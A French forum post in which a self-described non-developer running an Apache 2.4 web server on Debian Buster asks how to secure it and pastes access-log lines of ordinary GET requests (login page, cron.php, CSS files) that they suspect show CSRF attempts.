Sécurisation d'un serveur web sous apache 2.4 et debian buster

Bonsoir à tous,

Je viens vous voir car ça fait bien une semaine que je recherche des solutions pour sécuriser mon serveur web. J’utilise un vps, et ne suis malheureusement pas développeur, mais avoir un serveur à gérer et je pense une bonne façon aussi d’en apprendre plus sur la sécurité web.

J’ai subis diverses attaques il y a de ça une semaine environ, les logs indiquent une tentative d’attaques crsf ainsi que des récupération de pages css sûrement pour de ingénierie …

Voici les quelques logs en question :

193.248.252.103 - - [11/May/2020:18:01:25 +0000] « GET /cron.php HTTP/1.1 » 200 991 « - » « Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 »

96.126.126.80 - - [11/May/2020:18:08:29 +0000] « GET /index.php/login HTTP/1.1 » 200 3016 « https://mon_site/ » « Go-http-client/1.1 »

46.45.185.182 - - [11/May/2020:20:41:42 +0000] « GET / HTTP/1.1 » 301 626 « - » "Mozilla/5.0 (Macintosh; Inte

193.248.252.103 - - [11/May/2020:20:51:48 +0000] « GET /index.php/login HTTP/1.1 » 200 9820 « - » « Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 »
193.248.252.103 - - [11/May/2020:20:51:49 +0000] « GET /apps/files_pdfviewer/css/style.css?v=6a154fe0-11 HTTP/1.1 » 200 910 « - » « Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 »
193.248.252.103 - - [11/May/2020:20:51:49 +0000] « GET /core/css/guest.css?v=40f029ed-11 HTTP/1.1 » 200 6243 « - » « Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 »
193.248.252.103 - - [11/May/2020:20:51:49 +0000] « GET /index.php/apps/theming/styles?v=11 HTTP/1.1 » 200 2044 « - » "Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.